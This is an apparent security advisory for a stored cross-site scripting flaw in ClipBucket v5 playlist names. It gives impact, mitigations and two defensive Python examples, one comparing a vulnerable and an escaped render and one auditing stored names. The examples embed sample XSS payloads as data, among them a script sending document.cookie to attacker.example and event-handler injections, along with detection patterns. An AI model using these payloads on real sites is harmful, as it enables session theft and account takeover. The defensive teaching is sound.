CVE-2025-64339: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MacWarrior clipbucket-v5
ClipBucket v5 is an open source video sharing platform. In versions 5.5.2-#146 and below, the Manage Playlists feature is vulnerable to stored Cross-site Scripting (XSS), specifically in the Playlist Name field. An authenticated low-privileged user can create a playlist with a malicious name containing HTML/JavaScript code, which is rendered unescaped on playlist detail and listing pages. This results in arbitrary JavaScript execution in every viewer's browser, including administrators. This issue is fixed in version 5.5.2-#147.
AI Analysis
Technical Summary
CVE-2025-64339 is a stored Cross-site Scripting (XSS) vulnerability in ClipBucket v5, an open-source video sharing platform developed by MacWarrior. It affects versions 5.5.2-#146 and earlier and lives in the Manage Playlists feature, specifically in the Playlist Name field. An authenticated low-privileged user can save a playlist whose name contains HTML or JavaScript. Because the application does not escape the stored name when it renders the playlist detail and listing pages, the markup is written into the page verbatim and the embedded script runs in the browser of every user who views those pages, including administrators. The script executes in the origin of the ClipBucket site with the viewer's session, so it can read page content, send requests as the victim (including administrative actions when the victim is an administrator), steal cookies that lack the HttpOnly flag, or redirect the victim to attacker-controlled content. In practice this turns an ordinary account into a path to administrative control: the attacker plants the name once and waits for an administrator to open any page that displays it. No privileges beyond a regular authenticated account are required, and the victim's only interaction is viewing a page that shows the name. The CVSS 4.0 base score reported for the issue is 7.2 (high), reflecting the network attack vector, low attack complexity, low privileges required and user interaction limited to viewing a page. The vulnerability was publicly disclosed on November 7, 2025 and is fixed in version 5.5.2-#147. No exploitation in the wild had been reported at the time of disclosure. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation); the root cause is missing context-aware output encoding of user-supplied data at render time, which input validation alone does not fix.
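To make the defect class concrete, the following added Python example (not ClipBucket code; the template fragment, the function names and the sample playlist names are assumptions for illustration) renders a playlist row once without escaping and once with html.escape, then parses both outputs the way a browser would, reporting which tags and event-handler attributes the stored name introduced. The third sample shows that no <script> tag is needed: an event handler on an image is enough.

```python
"""Stored XSS via an unescaped playlist name: vulnerable render beside the fix.

Added example, not ClipBucket code. The template fragment, the function
names and the sample playlist names are assumptions made for illustration;
ClipBucket's real templates and routes are not reproduced here.
"""
import html
from html.parser import HTMLParser

# Tags the (assumed) template legitimately emits for one playlist row.
TEMPLATE_TAGS = {"li", "a"}

# Constructed sample names. The second is a classic script payload; the
# third shows that an event-handler attribute is enough, no <script> needed.
SAMPLE_NAMES = [
    "My holiday clips",
    "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "<img src=x onerror=\"alert(document.domain)\">",
]


def render_row_vulnerable(playlist_id: int, name: str) -> str:
    """Interpolates the stored name verbatim into the listing page.

    This mirrors the defect described in the advisory: whatever was stored
    in the database is written into the HTML unchanged."""
    return f'<li><a href="/playlist/{playlist_id}">{name}</a></li>'


def render_row_fixed(playlist_id: int, name: str) -> str:
    """Encodes the name for the HTML text-node context it lands in.

    html.escape(quote=True) turns < > & " ' into entities, which is the
    right encoding for a text node and for a quoted attribute value. A name
    placed into a JavaScript string or a URL would need a different encoder.
    The id is cast to int so it cannot carry markup either."""
    safe = html.escape(name, quote=True)
    return f'<li><a href="/playlist/{int(playlist_id)}">{safe}</a></li>'


class _InjectedMarkup(HTMLParser):
    """Collects tags and on* attributes that the template did not emit."""

    def __init__(self) -> None:
        super().__init__()
        self.foreign_tags: list[str] = []
        self.event_handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in TEMPLATE_TAGS:
            self.foreign_tags.append(tag)
        for attr, _ in attrs:
            if attr.lower().startswith("on"):
                self.event_handlers.append(f"{tag}@{attr}")


def injected_markup(rendered: str) -> dict:
    """Returns the tags and event handlers a browser would see that are not
    part of the template. Empty lists mean the name stayed inert text."""
    p = _InjectedMarkup()
    p.feed(rendered)
    p.close()
    return {"tags": p.foreign_tags, "handlers": p.event_handlers}


def compare(names=SAMPLE_NAMES) -> list[dict]:
    """Renders each name both ways and reports what leaks through."""
    out = []
    for i, name in enumerate(names, start=1):
        out.append({
            "name": name,
            "vulnerable": injected_markup(render_row_vulnerable(i, name)),
            "fixed": injected_markup(render_row_fixed(i, name)),
        })
    return out


if __name__ == "__main__":
    for row in compare():
        print(row)
```

The same parse-and-diff check works against a live page during a pentest: fetch the listing page after creating a playlist with a marker name and see whether any tag or on* attribute appears that the page's own template does not produce.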
Potential Impact
For European organizations running ClipBucket v5 for video sharing or community engagement, the practical risk is account takeover. Because the payload runs in the origin of the site with the viewer's session, the attacker only has to plant it and wait for an administrator to open a page that shows the playlist name: the script can then perform administrative actions on the attacker's behalf, steal session cookies that are not marked HttpOnly, or exfiltrate page content. With administrative control the attacker can alter site configuration, user accounts and uploaded content, deface the platform, or serve phishing pages and malware to the site's own users. Where the platform holds personal data of members or viewers, a compromise can trigger notification obligations and penalties under GDPR, on top of the loss of user trust and reputational damage. Customer-facing deployments with open registration are the most exposed, because the attacker needs nothing more than an ordinary account. The authentication requirement narrows the attack surface but does not remove it wherever registration is open, accounts are shared, or credential hygiene is weak.
Mitigation Recommendations
1. Upgrade immediately to ClipBucket v5 version 5.5.2-#147 or later, where the playlist name is escaped at render time.
2. After upgrading, audit the stored playlist names. The patch changes how names are rendered, not the rows already saved, so payloads planted before the fix remain in the database and any other consumer of that data (exports, feeds, a custom theme) may still render them raw. Rename or delete flagged playlists and review the owning accounts.
3. In the application itself, or in any fork, treat context-aware output encoding as the fix and input validation as defence in depth: encode every user-supplied string at the point where it is rendered (HTML text, attribute, JavaScript and URL contexts each need their own encoder) rather than trying to reject "dangerous" names on input.
4. Deploy a Content-Security-Policy that disallows inline scripts and inline event handlers (for example a script-src directive with nonces or hashes). It does not remove the bug, but it blocks the common payloads and produces violation reports that can be alerted on.
5. Set the HttpOnly, Secure and SameSite attributes on session cookies. HttpOnly stops cookie theft, but not actions the injected script performs with the victim's live session, so it is not a substitute for the upgrade.
6. Restrict playlist creation to accounts that need it and keep registration controls (e-mail verification, rate limits) in place, since any low-privileged account is enough to plant the payload.
7. Alert on playlist creations or renames whose name contains a raw "<", a "javascript:" URL or an on...= attribute, and on bursts of playlists from newly registered accounts.
8. A WAF rule for common XSS strings buys time but is bypassable; do not rely on it as the only control.
9. If an immediate upgrade is not possible, restrict the Manage Playlists feature to trusted users, and have administrators browse user-generated pages from a separate low-privilege account rather than their administrative session until the instance is patched.
10. Include user-supplied fields in routine template reviews, looking specifically for variables rendered without escaping.
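The post-upgrade audit of stored names (the patch changes rendering, not rows already saved) as an added Python example, not ClipBucket's own tooling: it scans rows of (playlist id, owner, name) for raw markup, javascript: URLs and event-handler attributes, and suggests a text-only replacement name for each hit. The rows are constructed sample data and the column layout is an assumption; the same checks apply to whatever query pulls playlist names from the real database.

```python
"""Audit stored playlist names for XSS payloads left behind before the fix.

Added example, not ClipBucket code. Upgrading changes how names are
rendered; it does not rewrite names an attacker already saved, and any other
consumer of the table (exports, feeds, an older theme) may still render them
raw. The rows below are constructed sample data and the (id, owner, name)
layout is an assumption; adapt the query that fills `rows`.
"""
import re
from html.parser import HTMLParser

# Constructed rows in the shape (playlist_id, owner_user_id, playlist_name).
SAMPLE_ROWS = [
    (1, 10, "Summer 2024"),
    (2, 10, "Rock & Roll <3"),                       # '<' followed by a digit: not a tag
    (3, 42, "<script>document.location='https://attacker.example/'</script>"),
    (4, 42, "<img src=x onerror=\"alert(1)\">"),
    (5, 42, "<a href=\"javascript:alert(1)\">click</a>"),
    (6, 42, "<svg/onload=alert(1)>"),
    (7, 7, "&lt;b&gt;not a tag&lt;/b&gt;"),          # entity-encoded: inert in a text node
]

# Each pattern carries a label so a flagged row says why it was flagged.
PATTERNS = [
    ("tag", re.compile(r"<\s*/?\s*[a-zA-Z!]")),               # <script, </a, <!--, <svg/onload
    ("event-handler", re.compile(r"\bon[a-zA-Z]+\s*=", re.I)),
    ("js-url", re.compile(r"javascript\s*:", re.I)),
    ("data-url", re.compile(r"data\s*:\s*text/html", re.I)),
]


def reasons(name: str) -> list[str]:
    """Returns the labels of every pattern that matches the raw stored name.

    The name is checked as stored, not entity-decoded: a name that only
    contains '&lt;script&gt;' renders as visible text in an HTML text node
    and is not executable there."""
    return [label for label, rx in PATTERNS if rx.search(name)]


class _TextOnly(HTMLParser):
    """Keeps text nodes, drops every tag and the bodies of script/style."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: list[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def strip_markup(name: str) -> str:
    """Suggested replacement for a flagged name: its visible text only."""
    p = _TextOnly()
    p.feed(name)
    p.close()
    return "".join(p.parts).strip()


def audit(rows=SAMPLE_ROWS) -> list[dict]:
    """Flags rows whose name contains markup, with the owning account so the
    same user's other content can be reviewed. A name that is nothing but
    markup gets a neutral placeholder as its suggested replacement."""
    findings = []
    for playlist_id, owner, name in rows:
        why = reasons(name)
        if why:
            findings.append({
                "playlist_id": playlist_id,
                "owner": owner,
                "reasons": why,
                "suggested_name": strip_markup(name) or f"playlist-{playlist_id}",
            })
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

The patterns are deliberately broad (any raw tag is flagged, not only known payloads) because a playlist name has no legitimate reason to contain markup; the cost of a false positive is one manual look at a row, while a miss leaves a live payload in the table.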
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-10-30T17:40:52.030Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 690d81c33ea13e495ecb0972
Added to database: 11/7/2025, 5:21:07 AM
Last enriched: 11/7/2025, 5:29:04 AM
Last updated: 11/8/2025, 8:00:26 AM